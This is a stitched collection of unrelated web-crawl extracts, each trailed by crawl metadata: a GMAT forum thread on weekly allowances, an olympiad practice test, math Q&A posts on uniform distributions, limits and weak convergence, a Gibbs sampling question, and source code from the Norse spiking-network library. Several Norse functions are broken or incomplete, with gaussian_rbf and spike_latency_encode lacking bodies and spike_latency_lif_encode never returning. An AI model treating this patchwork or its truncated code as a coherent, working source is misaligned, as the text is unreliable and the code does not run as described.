small weekly allowances
Main CR Qs link - cr-qs-600-700-level-131508.html
[Reveal] Spoiler: OA
_________________
********************
Push +1 kudos button please, if you like my post.
If you have any questions
New!
Manager
Status: Bunuel's fan!
Joined: 08 Jul 2011
Posts: 233
Followers: 1
Kudos [?]: 47 [0], given: 55
Re: CR - Evaluate - # 3 [#permalink]
### Show Tags
16 May 2012, 10:56
It is B since if parents use the same standard, the argument will hold true.
Manager
Joined: 28 May 2011
Posts: 193
Location: United States
GMAT 1: 720 Q49 V38
GPA: 3.6
WE: Project Management (Computer Software)
Followers: 2
Kudos [?]: 65 [0], given: 7
Re: CR - Evaluate - # 3 [#permalink]
### Show Tags
18 May 2012, 10:39
Conclusion :
Thus, in order to ensure that their children do not spend money on frivolous items, parents should not give their children large weekly allowances.
What would be most useful in evaluating the validity of the conclusion above is to know what is considered frivolous item. An item could be frivolous for one parent but not for another. In that case conclusion may not hold true because large amount itself may vary from $1 to$1000 and more.
_________________
-------------------------------------------------------------------------------------------------------------------------------
http://gmatclub.com/forum/a-guide-to-the-official-guide-13-for-gmat-review-134210.html
-------------------------------------------------------------------------------------------------------------------------------
GMAT Club Legend
Joined: 01 Oct 2013
Posts: 10370
Followers: 996
Kudos [?]: 224 [0], given: 0
### Show Tags
24 Jul 2016, 08:05
Hello from the GMAT Club VerbalBot!
Thanks to another GMAT Club member, I have just discovered this valuable topic, yet it had no discussion for over a year. I am now bumping it up - doing my job. I think you may find it valuable (esp those replies with Kudos).
Want to see all other topics I dig out? Follow me (click follow button on profile). You will receive a summary of all topics I bump in your profile area as well as via email.
Manager
Joined: 20 Jan 2016
Posts: 89
GMAT 1: 600 Q47 V26
Followers: 2
Kudos [?]: 4 [0], given: 5
### Show Tags
24 Jul 2016, 10:36
B for sure
Sent from my iPhone using GMAT Club Forum mobile app
Senior Manager
Joined: 26 Oct 2016
Posts: 460
Location: United States
Schools: HBS '19
GMAT 1: 770 Q51 V44
GPA: 4
WE: Education (Education)
Followers: 25
Kudos [?]: 62 [1] , given: 823
### Show Tags
17 Apr 2017, 11:35
1
KUDOS
frivolous :- not having any serious purpose or value.
Adolescents--->large weekly allowances-->spend on items not having any serious purpose or value.
Adolescents--->small weekly allowances-->do not spend on items not having serious purpose or value.
The conclusion of the passage is that parents can ensure that their children will not spend money on frivolous items by limiting their children's allowances. This claim is based on the observed difference between the spending habits of children who receive large allowances and those of children who receive small allowances. The argument assumes that the high dollar amount of the allowance – as opposed to some other unobserved factor – is directly linked to the fact that children spend the money on items their parents consider frivolous. Information that provides data about any other factor that might be the cause of the children's spending behavior would help to evaluate the validity of the conclusion.
(B) CORRECT. One alternative to the conclusion of the passage is that the standard used to judge an item as frivolous was much lower for parents who gave their children large weekly allowances than for parents who gave their children small weekly allowances. If for example, the former group of parents considered all movie tickets to be frivolous, while the latter did not, then this fact (and not the difference in allowance money) might explain the difference observed by the child development specialists. Thus, information about any differences among parents in the standard used to judge an item as frivolous would be extremely relevant in evaluating the validity of the conclusion of the passage.
(C) The background of the child development specialists who made the observation has no bearing on the conclusion. The conclusion is based on the observation, not on the credentials of those making the observation.
(D) Family income differences have no clear relevance to the link posited between high allowances and spending on frivolous items.
_________________
Thanks & Regards,
Anaira Mitch
Re: Child development specialists have observed that adolescents [#permalink] 17 Apr 2017, 11:35
Similar topics Replies Last post
Similar
Topics:
1 Evaluate Revision: Child development specialists have observed 3 26 Feb 2015, 14:52
20 Developed countries around the world have ... 9 11 Apr 2017, 17:10
2 In a study of the behavior of adolescents to parental 5 23 Nov 2015, 02:53
17 Recently in City X, residential developers have stopped 10 12 Aug 2016, 08:07
Recently in City X, developers have stopped buying land, 11 07 Oct 2013, 07:31
Display posts from previous: Sort by | 2017-05-24 03:28:15 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1774192750453949, "perplexity": 6256.859280774027}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-22/segments/1495463607731.0/warc/CC-MAIN-20170524020456-20170524040456-00555.warc.gz"} |
http://imomath.com/index.php?options=322&lmm=0 | # General Practice Test
1. (13 p.) A right circular cylinder has a diameter 12. Two plane cut the cylinder, the first perpendicular to the axis and the second at a $$45^o$$ angle to the first, so that the line of intersection of the two planes touches the cylinder at a single point. The two cuts remove a wedge from the cylinder. If $$V$$ is the volume of the wedge calculate $$V/\pi$$.
2. (3 p.) $$n$$ is an integer between 100 and 999 inclusive, and $$n^{\prime}$$ is the integer formed by reversing the digits of $$n$$. How many possible values are for $$|n-n^{\prime}|$$?
3. (27 p.) If the corresponding terms of two arithmetic progressions are multiplied we get the sequence 1440, 1716, 1848, ... . Find the eighth term of this sequence.
4. (37 p.) The right circular cone has height 4 and its base radius is 3. Its surface is painted black. The cone is cut into two parts by a plane parallel to the base, so that the volume of the top part (the small cone) divided by the volume of the bottom part equals $$k$$ and painted area of the top part divided by the painted are of the bottom part also equals $$k$$. If $$k$$ is of the form $$p/q$$ for two relatively prime numbers $$p$$ and $$q$$, calculate $$p+q$$.
5. (17 p.) Two students Alice and Bob participated in a two-day math contest. At the end both had attempted questions worth 500 points. Alice scored 160 out of 300 attempted on the first day and 140 out of 200 attempted on the second day, so her two-day success ratio was 300/500 = 3/5. Bob’s scores are different from Alice’s (but with the same two-day total). Bob had a positive integer score on each day. However, for each day Bob’s success ratio was less than Alice’s. Assume that $$p/q$$ ($$p$$ and $$q$$ are relatively prime integers) is the largest possible two-day success ratio that Bob could have achieved. Calculate $$p+q$$.
2005-2017 IMOmath.com | imomath"at"gmail.com | Math rendered by MathJax | 2017-12-16 20:22:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7467257380485535, "perplexity": 364.7254187763901}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948589177.70/warc/CC-MAIN-20171216201436-20171216223436-00080.warc.gz"} |
https://math.stackexchange.com/questions/1473250/difference-between-two-u0-1 | # Difference between two $U(0,1)$
Problem: Person $X$ and $Y$ are having a meeting. Person $X$ arrives at a meeting somewhere between $9$ and $10$, the arrival time is uniformly distributed. Person $Y$ arrives at a meeting somewhere between $9$ and $10$, the arrival time is uniformly distributed. What is the distrubtion of the waiting time for the person whom arrives first? Person $X$ are independent of person $Y$.
Attempt 1: Let $X \sim U(0,1)$ and $Y \sim U(0,1)$, $X$ and $Y$ are independent. Find the distribution for $T = \text{abs}(X - Y)$. But $\text{abs}()$ is hard so first let $V=X-Y$. We use the convolution formula to find that PDF(V) is a triangle with corners $(-1,0), (1,1), (0,1)$. PDF(-V) is the same. Since $V$ and $-V$ have the same pdf, $T$ has this PDF also (simply because $\text{abs}(a-b)=\max[ a-b, -(a-b) ]$.)
Attempt 2: Let $X \sim U(0,1)$ and $Y \sim U(0,1)$, $X$ and $Y$ are independent.. Find the distribution for $T = T_2 - T_1 = \max(X,Y) - \min(X,Y)$. We see that the CDF is $F_{T_2}(t) = t^2$ and $F_{T_2}(t) = 2t - t^2$ but then I cannot go further.
• – Henry Sep 15 '16 at 13:29
If $X,Y$ are independent and uniformly distributed over $[0,1]$ then the PDF of $Z=X-Y$ is supported on $[-1,1]$ and given by $f_Z(u)=1-|u|$. It follows that the PDF of $W=|Z|$ is supported on $[0,1]$ and given by $f_W(u) = 2-2u$.
• @jack-daurizio I see that the $f_Z(u)$ follows from math.stackexchange.com/questions/344844/… – jacob Oct 10 '15 at 13:53
• @jacob: if the PDF of $X$ is given by $f_X(u)$, the PDF of $|X|$ is given by $f_X(u)+f_X(-u)$, isn't it trivial? – Jack D'Aurizio Oct 10 '15 at 13:54 | 2020-09-28 01:37:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9354103207588196, "perplexity": 79.78130209102014}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600401583556.73/warc/CC-MAIN-20200928010415-20200928040415-00331.warc.gz"} |
https://stats.stackexchange.com/questions/240951/inference-using-gibbs-sampling | # Inference using Gibbs sampling
Suppose there is a one-dimensional normal distribution $\mathcal{N}(\mu, \sigma)$ for which we want to infer the joint distribution of the parameters using Gibbs sampling. Let $D$ be the data, consisting of $n$ datapoints $d_1, ..., d_n$. Assume a broad Gamma prior to the precision parameter $\beta=\frac{1}{\sigma^2}$.
So, now I need to find an expression for $P(\sigma | D, \mu)$. Note that $P(\sigma | D, \mu) \sim P(D| \mu, \sigma) P(\sigma)$.
I tried the following:
\begin{align} P(\sigma | D, \mu) &\propto P(D| \mu, \sigma) P(\sigma) \\ &\propto \Gamma(\sigma | \alpha, \beta) \prod\limits_{i=1}^n \mathcal{N}(d_i| \mu, \sigma) \end{align}
In the next step, I throw away the $(\sqrt{2 \pi})^n$ since that is a constant.
\begin{align} \qquad\qquad\qquad\qquad\qquad\qquad &\propto_\sigma \Gamma(\sigma | \alpha, \beta) \sigma^{-n} \prod\limits_{i=1}^n \exp(-\frac{\sum\limits_{i=1}^n (d_i - \mu)^2}{2 \sigma^2}) \\ &\propto \Gamma(\sigma | \alpha, \beta) \sigma^{-n} \exp(-\frac{\sum\limits_{i=1}^n (d_i - \mu)^2}{2 \sigma^2}) \\ &\propto \beta^{\alpha} \sigma^{\alpha-1} \exp(-\beta \sigma) \sigma^{-n} \exp(-\frac{\sum\limits_{i=1}^n (d_i - \mu)^2}{2 \sigma^2}) \\ &\propto \sigma^{\alpha-1-n} \exp(-\frac{\sum\limits_{i=1}^n (d_i - \mu)^2 - 2 \beta \sigma^3}{2 \sigma^2}) \end{align}
And now? Is it supposed to be another Gamma distribution? What steps am I missing? I don't see it yet.
• Your prior on $\sigma$ or $\sigma^{-1}$ cannot involve $\sigma$ as a parameter. If you assume a $\text{G}(a,b)$ prior on $\sigma^{-2}$, the parameters $a$ and $b$ must be fixed. – Xi'an Oct 18 '16 at 18:39
• Thank you, I tried to change it, hopefully the partial answer is correct now. – www.data-blogger.com Oct 18 '16 at 18:47
• Please register &/or merge your accounts (you can find information on how to do this in the My Account section of our help center), then you will be able to edit & comment on your own question. – gung - Reinstate Monica Oct 18 '16 at 18:56
• The Gamma prior should be on $\sigma^{-2}$ to enjoy conjugacy. – Xi'an Oct 18 '16 at 19:39
In the section 'Table of conjugate distributions', in 'Continuous distributions' table, look at 'Normal with known mean'. That is exactly what you need in this Gibbs sampling problem, since it gives you a solution to $P(\sigma | D, \mu)$. | 2021-03-04 10:19:14 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 2, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9894020557403564, "perplexity": 1372.7377983372592}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178368687.25/warc/CC-MAIN-20210304082345-20210304112345-00438.warc.gz"} |
https://socratic.org/questions/how-do-you-write-the-first-five-terms-of-the-geometric-sequence-a-1-2-r-x-4 | # How do you write the first five terms of the geometric sequence a_1=2, r=x/4?
Jun 6, 2017
$2 , \frac{x}{2} , {x}^{2} / 8 , {x}^{3} / 32 , {x}^{4} / 128$
#### Explanation:
multiply the previous term by the common ratio$\text{ } r$
${a}_{1} = 2$
${a}_{2} = {a}_{1} \times \frac{x}{4} = 2 \times \frac{x}{4} = \frac{x}{2}$
${a}_{3} = \frac{x}{2} \times \frac{x}{4} = {x}^{2} / 8$
${a}_{4} = {x}^{2} / 8 \times \frac{x}{4} = {x}^{3} / 32$
${a}_{5} = {x}^{3} / 32 \times \frac{x}{4} = {x}^{4} / 128$ | 2021-06-19 22:32:05 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 7, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8219273686408997, "perplexity": 1548.8743021610235}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623487649731.59/warc/CC-MAIN-20210619203250-20210619233250-00409.warc.gz"} |
https://norse.github.io/norse/_modules/norse/torch/functional/encode.html | # Source code for norse.torch.functional.encode
"""
Stateless encoding functionality for Norse, offering different ways to convert numerical
inputs to the spiking domain. Note that some functions, like population_encode does not return spikes,
but rather numerical values that will have to be converted into spikes via, for instance, the poisson encoder.
"""
from typing import Callable, Union
import torch
from .lif import lif_current_encoder, LIFParameters
[docs]def constant_current_lif_encode(
input_current: torch.Tensor,
seq_length: int,
p: LIFParameters = LIFParameters(),
dt: float = 0.001,
) -> torch.Tensor:
"""
Encodes input currents as fixed (constant) voltage currents, and simulates the spikes that
occur during a number of timesteps/iterations (seq_length).
Example:
>>> data = torch.as_tensor([2, 4, 8, 16])
>>> seq_length = 2 # Simulate two iterations
>>> constant_current_lif_encode(data, seq_length)
# State in terms of membrane voltage
(tensor([[0.2000, 0.4000, 0.8000, 0.0000],
[0.3800, 0.7600, 0.0000, 0.0000]]),
# Spikes for each iteration
tensor([[0., 0., 0., 1.],
[0., 0., 1., 1.]]))
Parameters:
input_current (torch.Tensor): The input tensor, representing LIF current
seq_length (int): The number of iterations to simulate
p (LIFParameters): Initial neuron parameters.
dt (float): Time delta between simulation steps
Returns:
A tensor with an extra dimension of size seq_length containing spikes (1) or no spikes (0).
"""
v = torch.zeros(*input_current.shape, device=input_current.device)
z = torch.zeros(*input_current.shape, device=input_current.device)
spikes = torch.zeros(seq_length, *input_current.shape, device=input_current.device)
for ts in range(seq_length):
z, v = lif_current_encoder(input_current=input_current, voltage=v, p=p, dt=dt)
spikes[ts] = z
return spikes
[docs]def gaussian_rbf(tensor: torch.Tensor, sigma: float = 1):
"""
A gaussian radial basis kernel <https://en.wikipedia.org/wiki/Radial_basis_function_kernel>_
that calculates the radial basis given a distance value (distance between :math:x and a data
value :math:x', or :math:\\|\\mathbf{x} - \\mathbf{x'}\\|^2 below).
.. math::
K(\\mathbf{x}, \\mathbf{x'}) = \\exp\\left(- \\frac{\\|\\mathbf{x} - \\mathbf{x'}\\|^2}{2\\sigma^2}\\right)
Parameters:
tensor (torch.Tensor): The tensor containing distance values to convert to radial bases
sigma (float): The spread of the gaussian distribution. Defaults to 1.
"""
[docs]def euclidean_distance(x, y):
"""
Simple euclidean distance metric.
"""
return (x - y).pow(2)
[docs]def population_encode(
input_values: torch.Tensor,
out_features: int,
scale: Union[int, torch.Tensor] = None,
kernel: Callable[[torch.Tensor], torch.Tensor] = gaussian_rbf,
distance_function: Callable[
[torch.Tensor, torch.Tensor], torch.Tensor
] = euclidean_distance,
) -> torch.Tensor:
"""
Encodes a set of input values into population codes, such that each singular input value is represented by
a list of numbers (typically calculated by a radial basis kernel), whose length is equal to the out_features.
Population encoding can be visualised by imagining a number of neurons in a list, whose activity increases
if a number gets close to its "receptive field".
Gaussian curves representing different neuron "receptive fields". Image credit: Andrew K. Richardson_.
.. _Andrew K. Richardson: https://commons.wikimedia.org/wiki/File:PopulationCode.svg
Example:
>>> data = torch.as_tensor([0, 0.5, 1])
>>> out_features = 3
>>> pop_encoded = population_encode(data, out_features)
tensor([[1.0000, 0.8825, 0.6065],
[0.8825, 1.0000, 0.8825],
[0.6065, 0.8825, 1.0000]])
>>> spikes = poisson_encode(pop_encoded, 1).squeeze() # Convert to spikes
Parameters:
input_values (torch.Tensor): The input data as numerical values to be encoded to population codes
out_features (int): The number of output *per* input value
scale (torch.Tensor): The scaling factor for the kernels. Defaults to the maximum value of the input.
Can also be set for each individual sample.
kernel: A function that takes two inputs and returns a tensor. The two inputs represent the center value
(which changes for each index in the output tensor) and the actual data value to encode respectively.z
Defaults to gaussian radial basis kernel function.
distance_function: A function that calculates the distance between two numbers. Defaults to euclidean.
Returns:
A tensor with an extra dimension of size seq_length containing population encoded values of the input stimulus.
Note: An extra step is required to convert the values to spikes, see above.
"""
size = (input_values.size(0), out_features) + input_values.size()[1:]
if not scale:
scale = input_values.max()
centres = torch.linspace(0, scale, out_features).expand(size)
x = input_values.unsqueeze(1).expand(size)
distances = distance_function(x, centres) * scale
return kernel(distances)
[docs]def poisson_encode(
input_values: torch.Tensor,
seq_length: int,
f_max: float = 100,
dt: float = 0.001,
) -> torch.Tensor:
"""
Encodes a tensor of input values, which are assumed to be in the
range [0,1] into a tensor of one dimension higher of binary values,
which represent input spikes.
See for example https://www.cns.nyu.edu/~david/handouts/poisson.pdf.
Parameters:
input_values (torch.Tensor): Input data tensor with values assumed to be in the interval [0,1].
sequence_length (int): Number of time steps in the resulting spike train.
f_max (float): Maximal frequency (in Hertz) which will be emitted.
dt (float): Integration time step (should coincide with the integration time step used in the model)
Returns:
A tensor with an extra dimension of size seq_length containing spikes (1) or no spikes (0).
"""
return (
torch.rand(seq_length, *input_values.shape, device=input_values.device).float()
< dt * f_max * input_values
).float()
[docs]def poisson_encode_step(
input_values: torch.Tensor,
f_max: float = 1000,
dt: float = 0.001,
) -> torch.Tensor:
"""
Encodes a tensor of input values, which are assumed to be in the
range [0,1] into a tensor of binary values,
which represent input spikes.
See for example https://www.cns.nyu.edu/~david/handouts/poisson.pdf.
Parameters:
input_values (torch.Tensor): Input data tensor with values assumed to be in the interval [0,1].
f_max (float): Maximal frequency (in Hertz) which will be emitted.
dt (float): Integration time step (should coincide with the integration time step used in the model)
Returns:
A tensor containing binary values in .
"""
return (
torch.rand(*input_values.shape, device=input_values.device).float()
< dt * f_max * input_values
).float()
[docs]def signed_poisson_encode(
input_values: torch.Tensor, seq_length: int, f_max: float = 100, dt: float = 0.001
) -> torch.Tensor:
"""
Encodes a tensor of input values, which are assumed to be in the
range [-1,1] into a tensor of one dimension higher of binary values,
which represent input spikes.
Parameters:
input_values (torch.Tensor): Input data tensor with values assumed to be in the interval [-1,1].
sequence_length (int): Number of time steps in the resulting spike train.
f_max (float): Maximal frequency (in Hertz) which will be emitted.
dt (float): Integration time step (should coincide with the integration time step used in the model)
Returns:
A tensor with an extra dimension of size seq_length containing values in {-1,0,1}
"""
return (
torch.sign(input_values)
* (
torch.rand(seq_length, *input_values.shape).float()
< dt * f_max * torch.abs(input_values)
).float()
)
[docs]def signed_poisson_encode_step(
input_values: torch.Tensor, f_max: float = 1000, dt: float = 0.001
) -> torch.Tensor:
"""
Creates a poisson distributed signed spike vector, when
Parameters:
input_values (torch.Tensor): Input data tensor with values assumed to be in the interval [-1,1].
f_max (float): Maximal frequency (in Hertz) which will be emitted.
dt (float): Integration time step (should coincide with the integration time step used in the model)
Returns:
A tensor containing values in {-1,0,1}.
"""
return (
torch.sign(input_values)
* (
torch.rand(*input_values.shape, device=input_values.device).float()
< dt * f_max * torch.abs(input_values)
).float()
)
[docs]def spike_latency_lif_encode(
input_current: torch.Tensor,
seq_length: int,
p: LIFParameters = LIFParameters(),
dt=0.001,
) -> torch.Tensor:
"""Encodes an input value by the time the first spike occurs.
Similar to the ConstantCurrentLIFEncoder, but the LIF can be
thought to have an infinite refractory period.
Parameters:
input_current (torch.Tensor): Input current to encode (needs to be positive).
sequence_length (int): Number of time steps in the resulting spike train.
p (LIFParameters): Parameters of the LIF neuron model.
dt (float): Integration time step (should coincide with the integration time step used in the model)
"""
voltage = torch.zeros_like(input_current)
z = torch.zeros_like(input_current)
spikes = []
for _ in range(seq_length):
z, voltage = lif_current_encoder(
input_current=input_current, voltage=voltage, p=p, dt=dt
)
[docs]def spike_latency_encode(input_spikes: torch.Tensor) -> torch.Tensor:
"""
For all neurons, remove all but the first spike. This encoding basically measures the time it takes for a
neuron to spike *first*. Assuming that the inputs are constant, this makes sense in that strong inputs spikes
fast.
See R. Van Rullen & S. J. Thorpe (2001): Rate Coding Versus Temporal Order Coding: What the Retinal Ganglion Cells Tell the Visual Cortex <https://doi.org/10.1162/08997660152002852>_.
Spikes are identified by their unique position within each sequence.
Example:
>>> data = torch.as_tensor([[0, 1, 1], [1, 1, 1]])
>>> spike_latency_encode(data)
tensor([[0, 1, 1],
[1, 0, 0]])
Parameters:
input_spikes (torch.Tensor): A tensor of input spikes, assumed to be at least 2D (sequences, ...)
Returns:
A tensor where the first spike (1) is retained in the sequence
""" | 2021-10-21 20:26:46 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5373627543449402, "perplexity": 10999.023207618982}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323585441.99/warc/CC-MAIN-20211021195527-20211021225527-00376.warc.gz"} |
https://mathoverflow.net/questions/176320/pointwise-in-time-convergence-in-h-1-implies-pointwise-weak-convergence-i/176354 | Pointwise (in time) convergence in $H^{-1}$ implies pointwise weak convergence in $L^q$, why?
Let $u_n \to u$ in $C^0([0,T];H^{-1}(\Omega))$ and suppose $\lVert u_n \rVert_{L^\infty(0,T;L^\infty(\Omega))} \leq C$ for all $n$.
It follows that for almost all $t$, $u_n(t)$ is bounded in $L^\infty(\Omega)$, so we can extract a weak-* convergent subsequence and after a bit of work we can show that $$\text{for almost all t} \qquad u_n(t) \rightharpoonup u(t) \text{ in L^q(\Omega)} \qquad\text{for all q < \infty.}$$
I want to show that this weak convergence holds for all $t$.
From personal correspondence, I have been told that
The key point is that one already has convergence in the larger space. So one already knows that pointwise, i.e. for all $t$, $u(t)$ converges in this larger space. But since it is also bounded in $L^\infty$, $u(t)$ [for almost all $t$ -- riem's note] will also converge weak-* up to a subsequence, and the limit is the same are identified as distributions. The same is true for any $L^q$, $q<\infty$.
Simply put, I don't get why it must hold for all $t$. I think we need to exploit the continuity of $u_n$ and $u$ wrt. $t$ in the larger space $H^{-1}$ but once again $L^q$ is a stronger space than this..
Originally posted on MSE.
The explanation is that by the hypotheses you in fact have $\lVert u_n \rVert_{\ell^{+\infty}([0,T],L^{+\infty}(\Omega))} \leq C$ for all $n$ as for arbitrarily fixed $t\in[0,T]$ you can take a sequence of $t_i\to t$ with $\lVert u_n(t_i) \rVert_{L^{+\infty}(\Omega)} \leq C$ and $u_n(t_i)\to u_n(t)$ in $H^{-1}(\Omega)$ . Then a subsequence converges also weakly$^*$ in $L^{+\infty}(\Omega)$ and hence $u_n(t)$ is also there with norm at most $C$ . So everything you have written "for almost all $t$ " in fact holds for all $t\in[0,T]$ . | 2021-02-26 10:37:14 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.97076416015625, "perplexity": 96.18740996198368}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178356456.56/warc/CC-MAIN-20210226085543-20210226115543-00500.warc.gz"} |
https://math.stackexchange.com/questions/2496298/how-to-evaluate-the-limit-lim-h-to-0-frach-sqrth4-2 | # How to evaluate the limit $\lim_{h \to 0}\frac{h}{\sqrt{h+4}-2}$?
I have tried multiplying the numerator and denominator by $\sqrt{h+4}-2$, but I am struggling to simplify it further. I have solved a few problems which usually end up in cancelling out the common variables, but I am unable to simplify this further.
I haven't learnt about L'Hôpital's rule etc. as I have just started learning calculus.
Hint: as $h \neq 0$, $$\frac{h}{\sqrt{h+4}-2} = \frac{h(\sqrt{h+4}+2)}{h+4-4} = \sqrt{h+4}+2$$
• So the limit is 4? Yes, it is thanks! – 10101010 Oct 30 '17 at 9:24
Hint: Rationalise the denominator by multiplying the numerator and denominator by $\sqrt{h+4} +2$ and cancel the $h's$.
Then you are only left with $\lim_{h \to 0}{\sqrt{h+4}+2}$
The method you'll want to use is multiplying the denominator and numerator both by $\sqrt{h+4} + 2$. Remember to switch the minus to a plus ( or vice versa), otherwise you are just squaring the denominator.
Hint:
The limit is the inverse of
$$\lim_{h \to 0}\frac{\sqrt{4+h}-\sqrt4}{h},$$ which should ring a bell. | 2019-09-24 08:53:39 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9813928008079529, "perplexity": 159.6368924933732}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": 